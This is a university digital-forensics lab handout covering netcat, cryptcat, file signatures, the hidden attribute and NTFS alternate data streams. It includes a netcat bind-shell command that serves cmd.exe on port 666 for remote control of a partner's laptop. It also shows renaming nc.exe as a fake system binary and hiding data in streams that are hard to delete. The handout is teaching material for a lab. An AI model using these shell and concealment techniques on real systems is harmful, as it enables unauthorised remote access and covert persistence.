TP 1 Forensic

Netcat Tutorial
netcat (netcat/nc.exe in the Windows partition on your laptops) is the Swiss Army
Knife of networking. It is a simpe tool (originally UNIX, then ported to Windows)
that reads and writes data across a network connection, using either TCP or UDP.

-d detach from console

-e prg executes inbound program
listen mode (waiting for inbound
-l
connections)
listen mode (relisten on socket
-L
close)
-n numeric IP addresses only
-o file hexadecimal dump of traffic
-p port local port number
-u udp mode (tcp is default)
-v, -vv verbose mode

Table 1:Netcat Command List (www.atstake.com/tools)

Monitor all network traffic with ethereal. Use Ethereal help in order to find out a
filter so that you are only reading traffic to and from your own machine. (Not because
of privacy issues, but because you do not want to get overwhelmed with too much
data).

Remote Program Execution

Divide yourself in groups of two laptops. In this exercise we remotely control another
computer. To get netcat to listen on port 666, type
nc -L -p 666 -e cmd.exe

This tells netcat to listen (really hard, i.e. multiple times) on port 666 and when
someone connects to this port, to execute cmd.exe. On the (attacking) computer,
execute the program
nc -v -n 10.0.0.14 666
This lets netcat connect to computer 10.0.0.14 on port 666. (Of course, you'll
probably have to change the IP address.) To show that you connected to the other
computer, create a small file.

File Transfer
Netcat can be used to transfer data from a suspect machine to the forensic machine.
Designate your two machines.

In the directory foundstone, you find a set of interesting tools. Foundstone\fport gives
a list of programs that use certain ports. For this exercise, we are going to transfer
the results of fport from the suspect machine to the forensic machine. (Notice, in real
life, you would want to run a trusted copy of fport from a USB thumb-drive, but here
we are trusting the built in fport.)

First, we set up the forensic machine to listen.

nc -l -p 666 > results

Then we get the data from the suspect machine. (Maybe you want to set up a few
more netcat listening connections there so that fport gives more interesting results.
Foundstone\fport | nc 10.0.0.14 666

We close the connection with Control C and now should have the results of fport in
the results file on the forensic machine.

Cryptcat
By looking at the results of ethereal, you find that transferred data is readable.
Therefore, you want to use sometimes cryptcat. Redo the exercise with cryptcat also
already found on your computer.

In general, you want to install as many tools as we use in the labs on your private
computer. Try to experiment with them.

Data Hiding
Renaming
One of the easiest way to hide a program is to rename it. For example, find the file
inetinfo.exe and make a copy of it for restoration. (If you do not restore the file, then
you are subject to academic penalties possibly involving flogging and burning at the
stake.) Actually, pretend that you are using inetinfo.exe (normally associated with
the IIS web server) by calling it ine1info.exe. Copy nc.exe into ine1info.exe and set
it up as a listener. Now execute fport. Can you tell that nc is actually running?

Malware like Backdoor.XTS and Spyware.SpyTech uses the filename svchost.exe,

because a number of svchost.exe processes are always running.

The Hidden Attribute

The hidden attribute prevents a file from being seen with Windows Explorer, unless
of course, the Folder Option dialogue (under Tools in WE) is set so that hidden files
are shown. If you use the dir command, you can specify
the /ah command. attrib will also display file attributes. Create and hide a file in the
My Document folder and show how easy it is to find anyway with dir and Windows
Explorer. Then delete the file.

File Signatures
Most file types contain a file signature at the very beginning of a file. Go to the
internet and download a number of different files in a folder named Temp. (If you
forget to delete the folder afterwards, bad things might occur.) Use Winhex to look
at the hexadecimal contents of the file. You will find many different file types have
a so-called signature at the very beginning. Find the codes for .jpg, .pdf, .gif, .wav
and a few other extensions.

NTFS Hidden Streams

NTFS streams allow us to store more than a single file under the same name. Create
a folder temp. (If one already exists, remove all its contents.) In the temp folder we
first create a file and then a stream.
c:\temp echo "This is a file" > file.txt

c:\temp echo "This is another file" > file.txt:hiddenstream.txt

Try now to find the second file. You cannot find it, but you can use it.
c:\temp notepad file.txt:hiddenstream.txt

To discover an alternative data stream (ADS), we need to use the BackUpRead() and
BackUpSeek() API calls that earlier tools do not use. However, there are a number
of tools available. SFind from Foundstone (on the computer), Streams.exe from
SysInternal (if you feel like downloading that, go ahead, place it next to the
Foundstone directory under SysInternal), lads.exe, etc.
Getting rid of an ADS without destroying the original file is difficult. One can copy
to a FAT file system, which would get rid of it or one can run the file through ftp.
However, all of this becomes more tedious, if we associate an ADS to a directory:
c:\temp echo "This is a file" > :ads.txt

We can also connect the ADS to a file protected by Windows File Protection, which
would make it nearly impossible to delete.

Merge Streams
An interesting utility to hide word document files. You might consider installing the
utility and trying it out at home. We can't do it here because we have no installation
of Word Office installed.

WinHex Analysis of a Floppy Drive

Use your skills with file signatures to find the images, pdf documents, and word
documents hidden on the floppy disk. The FTK image in dd format is here.